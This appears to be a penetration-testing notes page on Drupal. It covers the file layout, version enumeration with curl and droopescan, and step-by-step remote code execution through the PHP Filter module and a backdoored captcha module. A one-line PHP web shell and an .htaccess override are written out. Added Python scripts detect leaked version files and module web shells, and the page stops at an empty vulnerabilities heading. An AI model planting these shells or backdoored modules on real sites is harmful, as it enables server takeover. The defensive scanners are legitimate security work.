
Drupal

Drupal is a robust open-source content management system (CMS) used for building websites and web applications. It is highly flexible, scalable, and secure, making it suitable for blogs, enterprise websites, government portals, and social networks. With a strong modular architecture, Drupal allows extensive customization through modules and themes.

Tech Stack of Drupal

  • Backend: PHP (Symfony framework)
  • Frontend: HTML, CSS, JavaScript (jQuery, Twig for templating)
  • Database: MySQL, MariaDB, PostgreSQL, SQLite
  • Server: Apache, Nginx

File Structure

/drupal-root
├── core/                  # Drupal core files (framework, APIs, libraries)
├── modules/               # Contributed and custom modules (extend functionality)
├── themes/                # Installed themes (controls site design and layout)
├── sites/                 # Site-specific configuration and files
│   ├── default/           # Default site configuration (settings.php is critical)
│   ├── all/               # Modules and themes shared across multiple sites
│   └── example.com/       # Site-specific configurations for multi-site setups
├── profiles/              # Installation profiles (predefined configurations)
├── libraries/             # Third-party libraries used by modules or themes
├── vendor/                # Composer-managed dependencies
├── scripts/               # Scripts for automation and maintenance
├── web.config             # IIS web server configuration
├── .htaccess              # Apache server configuration (security and performance rules)
├── index.php              # Main entry point of Drupal
├── autoload.php           # Composer autoloader for PHP classes
├── robots.txt             # Controls search engine crawling behavior
├── README.txt             # Default file that may expose version info (security risk)
├── settings.php           # Database credentials & security settings (critical target for attackers)
├── services.yml           # Service container configuration
├── default.settings.php   # Default configuration file (should be secured)
├── install.php            # Installation script (should be removed after setup)
├── update.php             # Script to run database updates
├── .gitignore             # Git ignore rules for development
├── LICENSE.txt            # Drupal license information
└── CHANGELOG.txt          # Version history and updates

Enumeration

## Verify the site is based on Drupal
curl -s http://site.rezydev.xyz/ | grep Drupal

## Version enumeration
curl -s http://site.rezydev.xyz/CHANGELOG.txt
## Note: newer versions of Drupal don't allow reading CHANGELOG.txt and README.txt.

## Scan Drupal for themes, plugins, versions, interesting URLs, etc.
droopescan scan drupal -u http://site.rezydev.xyz/
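The checks below are an added example written for this page, not part of the original notes: run on a server's own docroot, they report which of the files from the layout above (CHANGELOG.txt, README.txt, install.php, default.settings.php) are still present to be fetched the way the curl commands do, and which version string they would reveal. They rely on Drupal 8+ storing its version in core/lib/Drupal.php (const VERSION) and on Drupal 7's CHANGELOG.txt opening with a "Drupal 7.xx, date" line; the demo docroot is constructed in a temp directory.

```python
import os
import re
import tempfile

# Files from the layout above that reveal the version or should not remain
# reachable after installation (constructed list for this example).
LEAKY_FILES = ["CHANGELOG.txt", "README.txt", "install.php", "default.settings.php"]

def drupal_version(docroot):
    """Infer the version as the enumeration above would: Drupal 8+ puts it in
    core/lib/Drupal.php (const VERSION = '...'); Drupal 7's CHANGELOG.txt starts
    with a line such as 'Drupal 7.58, 2018-03-28'. None if neither is present."""
    core_file = os.path.join(docroot, "core", "lib", "Drupal.php")
    if os.path.isfile(core_file):
        with open(core_file, encoding="utf-8", errors="replace") as fh:
            m = re.search(r"const VERSION\s*=\s*'([^']+)'", fh.read())
        if m:
            return m.group(1)
    changelog = os.path.join(docroot, "CHANGELOG.txt")
    if os.path.isfile(changelog):
        with open(changelog, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                m = re.match(r"Drupal (\d+\.\d+)", line)
                if m:
                    return m.group(1)
    return None

def exposed_files(docroot):
    """Return the leak-prone files that still exist in the web root."""
    return [f for f in LEAKY_FILES if os.path.isfile(os.path.join(docroot, f))]

def build_demo_docroot(path):
    """Constructed Drupal-7-style docroot with CHANGELOG.txt and install.php left in place."""
    os.makedirs(path, exist_ok=True)
    with open(os.path.join(path, "CHANGELOG.txt"), "w") as fh:
        fh.write("Drupal 7.58, 2018-03-28\n-----------------------\n")
    with open(os.path.join(path, "install.php"), "w") as fh:
        fh.write("<?php // installer stub\n")
    return path

def run_demo():
    root = build_demo_docroot(tempfile.mkdtemp())
    return drupal_version(root), exposed_files(root)

if __name__ == "__main__":
    print(run_demo())   # ('7.58', ['CHANGELOG.txt', 'install.php'])
```

Point drupal_version() and exposed_files() at a real docroot to see what an unauthenticated requester could learn; anything listed by exposed_files() should be removed or blocked at the web server.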

Exploitation

PHP Filter Module

In older versions of Drupal (before version 8), administrators could enable the PHP Filter module, which allowed embedded PHP code/snippets to be evaluated directly within content. This created an opportunity for attackers to execute arbitrary PHP code and gain Remote Code Execution (RCE).

Exploitation Steps

Before Version 8

  1. Log in to Drupal as an administrator.

  2. Navigate to Admin > Modules and enable the PHP Filter module.

    • Go to Configuration > Content authoring > Text formats and editors, and ensure that "PHP code" is selected under the Text format dropdown.
    • Save the configuration.

  3. Go to Content > Add content and create a Basic page.

  4. Insert a malicious PHP snippet, like:

    <?php system($_GET['cmd']);?>
    ## OR use pentestmonkey/php-reverse-shell

  5. Set the Text format dropdown to PHP code and save the page.

  6. Once saved, you will be redirected to the new page.

  7. Execute commands via the browser, or use cURL to request a command like:

    http://site.rezydev.xyz/node/3?cmd=id

    http://site.rezydev.xyz/node/3
    ## If a reverse-shell script was used instead, just visit the page
    ## and catch the shell with netcat.

From Version 8 Onwards

From version 8 onwards, the PHP Filter module is no longer installed by default. If you wish to leverage this functionality, you would need to install the module manually:

  1. Download the module from the Drupal website:

    wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

  2. Navigate to Admin > Reports > Available updates (or Extend in some versions).

  3. Click Browse, select the downloaded module file, and click Install.

  4. Once installed, create a new basic page, similar to the process in Drupal 7, and use the PHP code text format to insert the malicious code.

Backdooring a Module

Drupal allows users with appropriate permissions to upload and install new modules. An attacker with administrative or compromised credentials can create a backdoored module by adding a web shell to an existing module and uploading it to the site.

Exploitation Steps

  1. Download a legitimate Drupal module from the Drupal website.

    wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
    tar xvf captcha-8.x-1.2.tar.gz

  2. Create a PHP web shell inside the extracted module folder:

    <?php system($_GET['cmd']);?>

  3. Since Drupal denies direct access to the /modules folder, create a .htaccess file to override restrictions:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    </IfModule>

  4. Move the shell and .htaccess file into the module directory and create a new archive:

    mv shell.php .htaccess captcha/
    tar cvf captcha.tar.gz captcha/

  5. As an administrator, navigate to Manage > Extend and click on + Install new module.

  6. Upload and install the backdoored captcha.tar.gz archive.

    • Example installation page: http://site.rezydev.xyz/admin/modules/install

  7. Once installed, execute commands by browsing to:

    http://site.rezydev.xyz/modules/captcha/shell.php?cmd=id
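As an added defender-side example that is not part of the original page, the Python script below audits a Drupal checkout on disk for the two arbitrary-PHP paths described under PHP Filter Module and Backdooring a Module: it reports whether the exported core.extension.yml (Drupal 8+, assumed here to live at config/sync/) enables the php module, and walks modules/ for stray .htaccess files and PHP files that pass request parameters into system()-style calls. The demo site tree, including the shell.php and config contents, is constructed inside the script.

```python
import os
import re
import tempfile

# Dangerous PHP call fed from a request superglobal: the shape of the shell above (line-based heuristic).
SHELL_PATTERN = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)"
                           r"\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)

def php_filter_enabled(docroot):
    """True if exported core.extension.yml (Drupal 8+) lists 'php' under its 'module:' block."""
    path = os.path.join(docroot, "config", "sync", "core.extension.yml")  # assumed sync dir
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    block = re.search(r"^module:\n((?:[ \t]+.*\n?)*)", text, re.M)  # indented lines under module:
    return bool(block and re.search(r"^[ \t]+php:\s*-?\d+\s*$", block.group(1), re.M))

def scan_modules(docroot):
    """Walk modules/ and flag stray .htaccess files and PHP that pipes request input into a shell."""
    findings = []
    for dirpath, _dirs, files in os.walk(os.path.join(docroot, "modules")):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot)
            if name == ".htaccess":          # can override Drupal's own PHP-execution deny rules
                findings.append(("htaccess-override", rel))
            elif name.endswith((".php", ".inc", ".module")):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if SHELL_PATTERN.search(fh.read()):
                        findings.append(("request-to-shell", rel))
    return sorted(findings)

def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)

def build_demo_site(root):
    """Constructed tree: one clean module, a backdoored 'captcha', and config with php enabled."""
    _write(os.path.join(root, "modules", "token", "token.module"), "<?php\nfunction token_help() {}\n")
    _write(os.path.join(root, "modules", "captcha", "shell.php"), "<?php system($_GET['cmd']);?>\n")
    _write(os.path.join(root, "modules", "captcha", ".htaccess"), "RewriteEngine On\n")
    _write(os.path.join(root, "config", "sync", "core.extension.yml"),
           "module:\n  block: 0\n  php: 0\ntheme:\n  olivero: 0\nprofile: standard\n")
    return root

def run_demo():
    root = build_demo_site(tempfile.mkdtemp())
    return {"php_filter": php_filter_enabled(root), "findings": scan_modules(root)}
```

Call run_demo() to see the findings on the constructed tree, or point scan_modules() and php_filter_enabled() at a real docroot. The regex is a triage heuristic only; comparing the installed module tree against the pristine package from ftp.drupal.org is the reliable check for the backdoor case.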

Some Known Vulnerabilities